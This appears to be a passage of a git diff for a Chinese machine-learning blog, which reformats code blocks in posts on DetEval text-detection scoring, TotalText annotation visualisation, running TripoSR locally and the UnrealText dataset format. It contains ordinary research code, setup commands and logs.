    if num_non_zero_in_sigma >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_tau_candidates = np.where((local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0))
    num_qualified_tau_candidates = qualified_tau_candidates[0].shape[0]

    if num_qualified_tau_candidates == 1:
    if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp) and (local_sigma_table[gt_id, qualified_tau_candidates] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1
    elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr):
    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + fsc_k
    global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k

    local_accumulative_recall = local_accumulative_recall + fsc_k
    local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k

    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 one_to_many 的函数,它与之前的 one_to_one 函数类似,接受相同的参数。

    函数中的 for 循环遍历从 0 到 num_gt 的每个 gt_id,其中 num_gt 是标注数据的数量。

    @@ -875,7 +873,7 @@

    Deteval

    • many_to_one()
    -
    def many_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for det_id in range(num_det):
    # skip the following if the detection was matched
    if det_flag[0, det_id] > 0:
    continue

    non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
    num_non_zero_in_tau = non_zero_in_tau[0].shape[0]

    if num_non_zero_in_tau >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_sigma_candidates = np.where((local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
    num_qualified_sigma_candidates = qualified_sigma_candidates[0].shape[0]

    if num_qualified_sigma_candidates == 1:
    if ((local_tau_table[qualified_sigma_candidates, det_id] >= tp) and (local_sigma_table[qualified_sigma_candidates, det_id] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, qualified_sigma_candidates] = 1
    det_flag[0, det_id] = 1
    elif (np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp):
    det_flag[0, det_id] = 1
    gt_flag[0, qualified_sigma_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    global_accumulative_precision = global_accumulative_precision + fsc_k

    local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    local_accumulative_precision = local_accumulative_precision + fsc_k
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    def many_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for det_id in range(num_det):
    # skip the following if the detection was matched
    if det_flag[0, det_id] > 0:
    continue

    non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
    num_non_zero_in_tau = non_zero_in_tau[0].shape[0]

    if num_non_zero_in_tau >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_sigma_candidates = np.where((local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
    num_qualified_sigma_candidates = qualified_sigma_candidates[0].shape[0]

    if num_qualified_sigma_candidates == 1:
    if ((local_tau_table[qualified_sigma_candidates, det_id] >= tp) and (local_sigma_table[qualified_sigma_candidates, det_id] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, qualified_sigma_candidates] = 1
    det_flag[0, det_id] = 1
    elif (np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp):
    det_flag[0, det_id] = 1
    gt_flag[0, qualified_sigma_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    global_accumulative_precision = global_accumulative_precision + fsc_k

    local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    local_accumulative_precision = local_accumulative_precision + fsc_k
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 many_to_one 的函数,与之前的 one_to_oneone_to_many 函数类似,接受相同的参数。

    函数中的 for 循环遍历从 0 到 num_det 的每个 det_id,其中 num_det 是检测结果的数量。

    @@ -890,7 +888,7 @@

    Deteval

    • 保存结果
    -
    for idx in range(len(global_sigma)):
    print(allInputs[idx])
    local_sigma_table = global_sigma[idx]
    local_tau_table = global_tau[idx]

    num_gt = local_sigma_table.shape[0]
    num_det = local_sigma_table.shape[1]

    total_num_gt = total_num_gt + num_gt
    total_num_det = total_num_det + num_det

    local_accumulative_recall = 0
    local_accumulative_precision = 0
    gt_flag = np.zeros((1, num_gt))
    det_flag = np.zeros((1, num_det))

    #######first check for one-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for one-to-many case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_many(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for many-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = many_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)




    fid = open(fid_path, 'a+')
    try:
    local_precision = local_accumulative_precision / num_det
    excerpt ZeroDivisionError:
    local_precision = 0

    try:
    local_recall = local_accumulative_recall / num_gt
    excerpt ZeroDivisionError:
    local_recall = 0

    temp = ('%s______/Precision:_%s_______/Recall:_%s\n' % (allInputs[idx], str(local_precision), str(local_recall)))
    fid.write(temp)
    fid.close()
    try:
    recall = global_accumulative_recall / total_num_gt
    excerpt ZeroDivisionError:
    recall = 0

    try:
    precision = global_accumulative_precision / total_num_det
    excerpt ZeroDivisionError:
    precision = 0

    try:
    f_score = 2*precision*recall/(precision+recall)
    excerpt ZeroDivisionError:
    f_score = 0

    fid = open(fid_path, 'a')
    temp = ('Precision:_%s_______/Recall:_%s\n' %(str(precision), str(recall)))
    fid.write(temp)
    fid.close()
    print(temp)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    for idx in range(len(global_sigma)):
    print(allInputs[idx])
    local_sigma_table = global_sigma[idx]
    local_tau_table = global_tau[idx]

    num_gt = local_sigma_table.shape[0]
    num_det = local_sigma_table.shape[1]

    total_num_gt = total_num_gt + num_gt
    total_num_det = total_num_det + num_det

    local_accumulative_recall = 0
    local_accumulative_precision = 0
    gt_flag = np.zeros((1, num_gt))
    det_flag = np.zeros((1, num_det))

    #######first check for one-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for one-to-many case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_many(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for many-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = many_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)




    fid = open(fid_path, 'a+')
    try:
    local_precision = local_accumulative_precision / num_det
    excerpt ZeroDivisionError:
    local_precision = 0

    try:
    local_recall = local_accumulative_recall / num_gt
    excerpt ZeroDivisionError:
    local_recall = 0

    temp = ('%s______/Precision:_%s_______/Recall:_%s\n' % (allInputs[idx], str(local_precision), str(local_recall)))
    fid.write(temp)
    fid.close()
    try:
    recall = global_accumulative_recall / total_num_gt
    excerpt ZeroDivisionError:
    recall = 0

    try:
    precision = global_accumulative_precision / total_num_det
    excerpt ZeroDivisionError:
    precision = 0

    try:
    f_score = 2*precision*recall/(precision+recall)
    excerpt ZeroDivisionError:
    f_score = 0

    fid = open(fid_path, 'a')
    temp = ('Precision:_%s_______/Recall:_%s\n' %(str(precision), str(recall)))
    fid.write(temp)
    fid.close()
    print(temp)

    这段代码是一个循环,循环遍历 global_sigma 列表中的每个元素。

    在每次循环中,首先打印 allInputs[idx] 的值,然后将 global_sigma[idx] 赋值给 local_sigma_table,将 global_tau[idx] 赋值给 local_tau_table

    @@ -1065,7 +1063,7 @@

    计划(

    可视化数据集

    ​ 根据数据集的源图像以及它的 txt 标注格式,再一阵 ChatGPT 和一阵操作,写一个可视化代码:

    -
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 396

    image_dir = r'E:\dataset\TotalText\Images\Test\\'
    label_dir = r'E:\dataset\TotalText\GroundTruth\Text\Test\\'

    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]
    transcriptions = annotation[annotation.find("transcriptions: [u'") + 19: -3]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, ornt, (x[0], y[0] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))
    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 396

    image_dir = r'E:\dataset\TotalText\Images\Test\\'
    label_dir = r'E:\dataset\TotalText\GroundTruth\Text\Test\\'

    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]
    transcriptions = annotation[annotation.find("transcriptions: [u'") + 19: -3]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, ornt, (x[0], y[0] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))
    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    @@ -1284,6 +1282,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Training Deep Networks with Synthetic Data-Bridging the Reality Gap by Domain Randomization/index.html b/posts/Paper-Training Deep Networks with Synthetic Data-Bridging the Reality Gap by Domain Randomization/index.html index 13fa828fac..3f0acf3f97 100644 --- a/posts/Paper-Training Deep Networks with Synthetic Data-Bridging the Reality Gap by Domain Randomization/index.html +++ b/posts/Paper-Training Deep Networks with Synthetic Data-Bridging the Reality Gap by Domain Randomization/index.html @@ -44,8 +44,6 @@ - - @@ -775,6 +773,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-TripoSR-Fast 3D Object Reconstruction from a Single Image/index.html b/posts/Paper-TripoSR-Fast 3D Object Reconstruction from a Single Image/index.html index a3d76126a8..6c348ca3a5 100644 --- a/posts/Paper-TripoSR-Fast 3D Object Reconstruction from a Single Image/index.html +++ b/posts/Paper-TripoSR-Fast 3D Object Reconstruction from a Single Image/index.html @@ -44,8 +44,6 @@ - - @@ -480,9 +478,9 @@

    开跑

    ​ 可以到 TripoSR - a Hugging Face Space by stabilityai 在线玩,也可以尝试离线部署。

    ​ 从 VAST-AI-研究/TripoSR (github.com) 获取代码仓库。

    ​ 整一个虚拟环境:

    -
    conda create -n TripoSR python=3.9
    +
    1
    conda create -n TripoSR python=3.9

    ​ 装好 pytorch 后,在代码仓库里装好库:

    -
    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
    +
    1
    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    ​ 看一下 run.py 里的 argparse:

    @@ -535,15 +533,15 @@

    开跑

    ​ 由于墙内下载 huggingface 的模型容易失败,改为采用离线加载模型的形式。修改 run.py 里的内容:

    -
    parser.add_argument(
    "--pretrained-model-name-or-path",
    default= "models/", # "stabilityai/TripoSR",
    type=str,
    help="Path to the pretrained model. Could be either a huggingface model id is or a local path. Default: 'stabilityai/TripoSR'",
    )
    +
    1
    2
    3
    4
    5
    6
    parser.add_argument(
    "--pretrained-model-name-or-path",
    default= "models/", # "stabilityai/TripoSR",
    type=str,
    help="Path to the pretrained model. Could be either a huggingface model id is or a local path. Default: 'stabilityai/TripoSR'",
    )

    ​ 从 stabilityai/TripoSR at main (huggingface.co) 下载 config.yamlmodel.ckptmodels/ 下:

    放置模型

    ​ 准备一张模型图片,就决定是你了!淘宝吉祥物!

    阿里吉祥物

    ​ 开跑!

    -
    python run.py examples/XXX.png --output-dir output/
    +
    1
    python run.py examples/XXX.png --output-dir output/

    ​ emmm 还是下了一个叫 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' 的东西,还好没被墙。

    -
    2024-03-18 11:02:00,713 - INFO - Initializing model ...
    Downloading config.json: 100%|█████████████████████████████████████████████████████████| 454/454 [00:00<00:00, 149kB/s]
    C:\Users\19048\.conda\envs\TripoSR\lib\site-packages\huggingface_hub\file_download.py:137: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\19048\.cache\huggingface\hub. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
    To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
    warnings.warn(message)
    2024-03-18 11:02:07,536 - INFO - Initializing model finished in 6819.83ms.
    2024-03-18 11:02:07,539 - INFO - Processing images ...
    Downloading data from 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' to file 'C:\Users\19048\.u2net\u2net.onnx'.
    100%|########################################| 176M/176M [00:00<00:00, 117GB/s]
    2024-03-18 11:02:30,617 - INFO - Processing images finished in 23078.31ms.
    2024-03-18 11:02:30,617 - INFO - Running image 1/1 ...
    2024-03-18 11:02:30,618 - INFO - Running model ...
    2024-03-18 11:02:35,306 - INFO - Running model finished in 4686.22ms.
    2024-03-18 11:02:35,306 - INFO - Exporting mesh ...
    torchmcubes was not compiled with CUDA support, use CPU version instead.
    2024-03-18 11:02:37,869 - INFO - Exporting mesh finished in 2563.17ms.
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    2024-03-18 11:02:00,713 - INFO - Initializing model ...
    Downloading config.json: 100%|█████████████████████████████████████████████████████████| 454/454 [00:00<00:00, 149kB/s]
    C:\Users\19048\.conda\envs\TripoSR\lib\site-packages\huggingface_hub\file_download.py:137: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\19048\.cache\huggingface\hub. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
    To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
    warnings.warn(message)
    2024-03-18 11:02:07,536 - INFO - Initializing model finished in 6819.83ms.
    2024-03-18 11:02:07,539 - INFO - Processing images ...
    Downloading data from 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' to file 'C:\Users\19048\.u2net\u2net.onnx'.
    100%|########################################| 176M/176M [00:00<00:00, 117GB/s]
    2024-03-18 11:02:30,617 - INFO - Processing images finished in 23078.31ms.
    2024-03-18 11:02:30,617 - INFO - Running image 1/1 ...
    2024-03-18 11:02:30,618 - INFO - Running model ...
    2024-03-18 11:02:35,306 - INFO - Running model finished in 4686.22ms.
    2024-03-18 11:02:35,306 - INFO - Exporting mesh ...
    torchmcubes was not compiled with CUDA support, use CPU version instead.
    2024-03-18 11:02:37,869 - INFO - Exporting mesh finished in 2563.17ms.

    ​ 这个程序会自动帮你抠图:

    自动扣图

    ​ 不过抠得不是很好,导致生成的模型多了点背景信息。我们手动抠图再试一次:

    @@ -774,6 +772,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-U-Net-Convolutional Networks for Biomedical Image Segmentation/index.html b/posts/Paper-U-Net-Convolutional Networks for Biomedical Image Segmentation/index.html index 554b0bbd53..27160d29de 100644 --- a/posts/Paper-U-Net-Convolutional Networks for Biomedical Image Segmentation/index.html +++ b/posts/Paper-U-Net-Convolutional Networks for Biomedical Image Segmentation/index.html @@ -44,8 +44,6 @@ - - @@ -689,6 +687,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-UnrealROX+ An Improved Tool for Acquiring Synthetic Data from Virtual 3D Environments/index.html b/posts/Paper-UnrealROX+ An Improved Tool for Acquiring Synthetic Data from Virtual 3D Environments/index.html index c3eace10cb..cf132d40af 100644 --- a/posts/Paper-UnrealROX+ An Improved Tool for Acquiring Synthetic Data from Virtual 3D Environments/index.html +++ b/posts/Paper-UnrealROX+ An Improved Tool for Acquiring Synthetic Data from Virtual 3D Environments/index.html @@ -44,8 +44,6 @@ - - @@ -739,6 +737,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html b/posts/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html index 7730170d89..4962749277 100644 --- a/posts/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html +++ b/posts/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html @@ -44,8 +44,6 @@ - - @@ -450,18 +448,18 @@

    数据集

    Multilingual 多语言版本包含 10 种语言:阿拉伯语,英语,法语,中文,德语,韩语,日语,意大利语,孟加拉语,印地语

    这两个数据集大概有 150 GB 左右,所以把它拆成了 130 个左右的文件,它们的组织方式如下:

    -
    ./
    +---sub_0
    +---imgs
    | 0.jpg
    | 1.jpg
    | ...
    |
    +---labels
    | 0.json
    | 1.json
    | ...
    |
    +---sub_1
    +---sub_2
    +---sub_3
    ...
    +---sub_100
    ...
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    ./
    +---sub_0
    +---imgs
    | 0.jpg
    | 1.jpg
    | ...
    |
    +---labels
    | 0.json
    | 1.json
    | ...
    |
    +---sub_1
    +---sub_2
    +---sub_3
    ...
    +---sub_100
    ...

    标签按以下格式存储:

    -
    {
    "imgfile":str path to the corresponding image file, e.g. "imgs/0.jpg",
    "bbox": List[
    word_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "cbox": List[
    char_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "text": List[str]
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    {
    "imgfile":str path to the corresponding image file, e.g. "imgs/0.jpg",
    "bbox": List[
    word_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "cbox": List[
    char_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "text": List[str]
    }

    举例:

    jpg

    -
    {
    "imgfile": "imgs/54.jpg",
    "bbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "cbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [236, 437, 291, 457, 286, 475, 229, 456], [222, 476, 274, 492, 268, 514, 214, 500], [457, 560, 572, 536, 578, 573, 459, 593], [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "text": ["\"process", "Caloger", "billowin", "746", "Sasc", "(Twitter", "AlHarth", "corporation", "Val", "MARKET", "habits", "He", "\u201cT", "(tr", "hu", "180", "Dr", "Ch", "sic", "Ab", "Fo", "in", "Temes,", "Ar", "F3D2Ms)", "Viaduct\"", "\u2018An", "dracae", "\u00d8land", "\"Dev", "throwback", "locus", "GB)", "Central\u2013St", "USHL/NH", "touc", "Sele", "flat", "tsao", "Novn", "Eckh", "French", "Melapia", "E", "floor"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    {
    "imgfile": "imgs/54.jpg",
    "bbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "cbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [236, 437, 291, 457, 286, 475, 229, 456], [222, 476, 274, 492, 268, 514, 214, 500], [457, 560, 572, 536, 578, 573, 459, 593], [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "text": ["\"process", "Caloger", "billowin", "746", "Sasc", "(Twitter", "AlHarth", "corporation", "Val", "MARKET", "habits", "He", "\u201cT", "(tr", "hu", "180", "Dr", "Ch", "sic", "Ab", "Fo", "in", "Temes,", "Ar", "F3D2Ms)", "Viaduct\"", "\u2018An", "dracae", "\u00d8land", "\"Dev", "throwback", "locus", "GB)", "Central\u2013St", "USHL/NH", "touc", "Sele", "flat", "tsao", "Novn", "Eckh", "French", "Melapia", "E", "floor"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

    jpg

    -
    {
    "imgfile": "imgs/15.jpg",
    "bbox": [[772, 225, 807, 221, 806, 233, 771, 237], [811, 217, 888, 207, 886, 228, 810, 236],

    ......

    , [815, 301, 857, 303, 855, 314, 814, 311], [862, 304, 894, 305, 891, 316, 860, 314], [900, 306, 931, 307, 927, 322, 897, 319]],
    "cbox": [[772, 226, 773, 226, 773, 236, 771, 237], [774, 226, 779, 225, 778, 234, 773, 235],

    ......

    , [892, 309, 893, 309, 891, 316, 890, 316], [900, 306, 912, 306, 909, 318, 897, 317], [913, 306, 922, 307, 919, 318, 910, 318], [922, 311, 928, 311, 925, 321, 920, 320], [927, 320, 928, 320, 927, 322, 926, 322]],
    "text": ["[Mondial]", "\u092d\u0942\u0935\u093f\u091c\u094d\u091e\u093e\u0928\u0940\u0913\u0901", "\u0926\u0928\u093f\u092f\u093e\u0932", "1011)",

    ......

    , "31,438", "6/8/2006", "\u0646\u0628\u064a\u0644", "\u0646\u0627\u0637\u0642\u062a\u0627\u0646", "\u0645\u0647", "\u092e\u0948\u091f\u0930\u0928\u093f\u0916", "\u0935\u093f\u091a\u0947\u091c", "\u091b\u093f\u091c\u093c"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    {
    "imgfile": "imgs/15.jpg",
    "bbox": [[772, 225, 807, 221, 806, 233, 771, 237], [811, 217, 888, 207, 886, 228, 810, 236],

    ......

    , [815, 301, 857, 303, 855, 314, 814, 311], [862, 304, 894, 305, 891, 316, 860, 314], [900, 306, 931, 307, 927, 322, 897, 319]],
    "cbox": [[772, 226, 773, 226, 773, 236, 771, 237], [774, 226, 779, 225, 778, 234, 773, 235],

    ......

    , [892, 309, 893, 309, 891, 316, 890, 316], [900, 306, 912, 306, 909, 318, 897, 317], [913, 306, 922, 307, 919, 318, 910, 318], [922, 311, 928, 311, 925, 321, 920, 320], [927, 320, 928, 320, 927, 322, 926, 322]],
